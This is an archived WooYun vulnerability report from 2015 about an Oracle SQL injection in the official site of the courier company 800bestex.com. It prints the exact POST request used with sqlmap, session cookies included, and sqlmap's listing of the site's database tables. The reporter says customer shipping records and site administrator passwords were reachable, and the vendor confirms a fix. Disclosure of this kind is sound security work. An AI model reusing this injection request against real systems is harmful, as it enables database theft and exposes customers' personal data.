当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142304

漏洞标题:百世汇通官网Oracle SQL注入,寄件人收件人信息、分站点管理员信息密码随便看

相关厂商:800bestex.com

漏洞作者: YHZX_2013

提交时间:2015-09-23 02:12

修复时间:2015-11-07 11:52

公开时间:2015-11-07 11:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-23: 细节已通知厂商并且等待厂商处理中
2015-09-23: 厂商已经确认,细节仅向厂商公开
2015-10-03: 细节向核心白帽子及相关领域专家公开
2015-10-13: 细节向普通白帽子公开
2015-10-23: 细节向实习白帽子公开
2015-11-07: 细节向公众公开

简要描述:

听说你们公司都是先确认签收后派件的……
所以来看看……

详细说明:

直接附上sqlmap用的数据包:
POST /q9api/serviceSite/queryServiceSiteInfo HTTP/1.1
Host: www.800bestex.com
Proxy-Connection: keep-alive
Content-Length: 98
Accept: */*
Origin: http://www.800bestex.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.800bestex.com/Site/ServiceQuery
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: wrawrsatrsrweasrdxsf=f5e4fd13fccf4126915b32c79432580e=WUBEw87awMZXw8L2Ini3Jp4SdZu4Uhl20IeeEgfBvyohT68FYykqQMf0cVQbUBDgsVLOvGLwwm6QrUncrWMTmF1djdNaFHaW+Srf37bESTdt6MBdDMSdR83XQeEAyzHzoarGpbaZ6QPC5+D6RYBl1tg71F5il/NJhc7ADT6K8ONWnfiiNPcE5+fIYxxHck4bOdK9HQaaFolMd7L5o39wng==&7efbda2aaf154233a72599cc67f8ea05=WUBEw87awMZXw8L2Ini3Jp4SdZu4Uhl20IeeEgfBvyohT68FYykqQMf0cVQbUBDgsVLOvGLwwm6QrUncrWMTmF1djdNaFHaW+Srf37bESTesGL32csTeyABys+mZCTzFG9YN1IbRYfABfZLK1JYUzozYBVDjeUjJn1ZZjXJvQTElBFY4tEkrjmrTu1u707LcPLJ3Rhsilq/Y9aWqbE+swg==&38fcbca168914c30b2e5966941f7d83e=WUBEw87awMZXw8L2Ini3Jp4SdZu4Uhl20IeeEgfBvyohT68FYykqQMf0cVQbUBDgsVLOvGLwwm6QrUncrWMTmF1djdNaFHaW+Srf37bESTeaFJ2NFMYe2AdrELRE1lMbUuDVwbDYZ08cJTVOFoGpI+lS015q+6OZpSEIAIpNo8RZJY3uHonxc8r64ALuvg8lq1ti4xp5J2iUYheZHSfdIA==; wrawrsatrsrweasrdxsfw2ewasjret=; Hm_lvt_8fd193f17ae8acf2be1a1cfc65323057=1442297916,1442675005; Hm_lpvt_8fd193f17ae8acf2be1a1cfc65323057=1442675347; CNZZDATA3653922=cnzz_eid%3D2129097870-1442296048-null%26ntime%3D1442672705; SERVERID=abeef9aba556725b78351277009456c1|1442675359|1442675000
province=%E6%B1%9F%E8%8B%8F%E7%9C%81&city=%E6%97%A0%E9%94%A1%E5%B8%82&county=&query=15&appId=HTWeb
Database: SYS
[24 tables]
+------------------------------+
| DUAL |
| AUDIT_ACTIONS |
| HS$_PARALLEL_METADATA |
| HS_BULKLOAD_VIEW_OBJ |
| HS_PARTITION_COL_NAME |
| HS_PARTITION_COL_TYPE |
| IMPDP_STATS |
| KU$NOEXP_TAB |
| KU$_DATAPUMP_MASTER_10_1 |
| KU$_DATAPUMP_MASTER_11_1 |
| KU$_DATAPUMP_MASTER_11_1_0_7 |
| KU$_DATAPUMP_MASTER_11_2 |
| KU$_LIST_FILTER_TEMP |
| KU$_LIST_FILTER_TEMP_2 |
| ODCI_PMO_ROWIDS$ |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| PLAN_TABLE$ |
| PSTUBTBL |
| STMT_AUDIT_OPTION_MAP |
| SYSTEM_PRIVILEGE_MAP |
| TABLE_PRIVILEGE_MAP |
| WRI$_ADV_ASA_RECO_DATA |
| WRR$_REPLAY_CALL_FILTER |
+------------------------------+
Database: XDB
[1 table]
+------------------------------+
| XDB$XIDX_IMP_T |
+------------------------------+
Database: SYSTEM
[4 tables]
+------------------------------+
| HELP |
| OL$ |
| OL$HINTS |
| OL$NODES |
+------------------------------+
Database: TWINKLE
[21 tables]
+------------------------------+
| WAT_BILL_CODE_DEFINE |
| WAT_CANTON |
| WAT_CODE_INFO |
| WAT_MENU |
| WAT_NOTICE |
| WAT_NOTICE_EXTEND |
| WAT_PHONE_LOG |
| WAT_ROLE |
| WAT_ROLE_GROUP |
| WAT_ROLE_GROUP_ROLE |
| WAT_SELF_PICKUP |
| WAT_SEND_BILL |
| WAT_SEND_BILL_LOG |
| WAT_SERVICE_PROVIDE |
| WAT_SERVICE_PROVIDE_EXTEND |
| WAT_SERVICE_SITE |
| WAT_SERVICE_SITE_EXTEND |
| WAT_SITE |
| WAT_USER |
| WAT_USER_ROLE |
| WAT_USER_ROLE_GROUP |
+------------------------------+

漏洞证明:

2.jpg


1.jpg


这里只找了两个表,dump了前10条数据作为证明,大概有1000多个站点密码和上万单号信息吧……

修复方案:

希望能为消费者考虑下,谢谢……

版权声明:转载请注明来源 YHZX_2013@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-23 11:51

厂商回复:

您好,漏洞确认存在,已经在处理。感谢您对百世安全的关注!

最新状态:

2015-09-23:已修复。